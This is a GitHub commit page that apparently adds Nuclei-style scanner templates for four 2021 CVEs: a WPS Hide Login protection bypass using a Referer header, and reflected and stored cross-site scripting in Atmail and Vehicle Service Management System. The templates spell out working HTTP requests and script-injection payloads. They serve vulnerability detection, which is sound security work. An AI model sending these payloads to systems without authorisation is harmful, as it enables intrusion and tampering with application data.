-
Notifications
You must be signed in to change notification settings - Fork 659
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
47 changed files
with
510 additions
and
40 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
id: CVE-2021-24917 | ||
|
||
info: | ||
name: WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header | ||
author: akincibor | ||
severity: high | ||
description: The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. | ||
reference: | ||
- https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24917 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24917 | ||
remediation: Fixed in version 1.9.1 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2021-24917 | ||
cwe-id: CWE-863 | ||
metadata: | ||
verified: "true" | ||
tags: cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve | ||
|
||
requests: | ||
- raw: | ||
- | | ||
GET /wp-admin/options.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Referer: something | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: header | ||
words: | ||
- 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1' | ||
|
||
- type: dsl | ||
dsl: | ||
- "!contains(tolower(location), 'wp-login.php')" | ||
|
||
extractors: | ||
- type: kval | ||
kval: | ||
- location |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,47 @@ | ||
id: CVE-2021-43574 | ||
|
||
info: | ||
name: Atmail Hosting Webserver 6.5.0 - Cross-site scripting | ||
author: arafatansari,ritikchaddha | ||
severity: medium | ||
description: | | ||
Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “format” parameter | ||
reference: | ||
- https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43574 | ||
- https://help.atmail.com/hc/en-us/sections/115003283988 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2021-43574 | ||
cwe-id: CWE-79 | ||
metadata: | ||
shodan-query: http.html:"Powered by Atmail" | ||
verified: "true" | ||
tags: cve,cve2021,atmail,xss | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
- "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
- "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
stop-at-first-match: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '<script>alert(document.domain)</script>" does not exist' | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 500 | ||
- 403 | ||
condition: or |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,51 @@ | ||
id: CVE-2021-46068 | ||
|
||
info: | ||
name: Vehicle Service Management System - Stored Cross Site Scripting | ||
author: TenBird | ||
severity: medium | ||
description: | | ||
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel. | ||
reference: | ||
- https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS | ||
- https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss | ||
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46068 | ||
classification: | ||
cve-id: CVE-2021-46068 | ||
metadata: | ||
verified: true | ||
tags: cve,cve2021,xss,vms,authenticated | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | ||
username={{username}}&password={{password}} | ||
- | | ||
POST /vehicle_service/classes/Users.php?f=save HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
id=1&firstname=Adminstrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin | ||
- | | ||
GET /vehicle_service/admin/?page=user HTTP/1.1 | ||
Host: {{Hostname}} | ||
req-condition: true | ||
redirects: true | ||
max-redirects: 2 | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "contains(all_headers_3, 'text/html')" | ||
- "status_code_3 == 200" | ||
- 'contains(body_3, "Adminstrator\"><script>alert(document.domain)</script> Admin")' | ||
condition: and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,53 @@ | ||
id: CVE-2021-46069 | ||
|
||
info: | ||
name: Vehicle Service Management System - Stored Cross Site Scripting | ||
author: TenBird | ||
severity: medium | ||
description: | | ||
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel. | ||
reference: | ||
- https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS | ||
- https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss | ||
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46069 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 4.8 | ||
cve-id: CVE-2021-46069 | ||
cwe-id: CWE-79 | ||
metadata: | ||
verified: "true" | ||
tags: cve,cve2021,xss,vms,authenticated | ||
requests: | ||
- raw: | ||
- | | ||
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | ||
username={{username}}&password={{password}} | ||
- | | ||
POST /vehicle_service/classes/Master.php?f=save_mechanic HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&[email protected]&status=1 | ||
- | | ||
GET /vehicle_service/admin/?page=mechanics HTTP/1.1 | ||
Host: {{Hostname}} | ||
req-condition: true | ||
redirects: true | ||
max-redirects: 2 | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "contains(all_headers_3, 'text/html')" | ||
- "status_code_3 == 200" | ||
- 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")' | ||
condition: and |
Oops, something went wrong.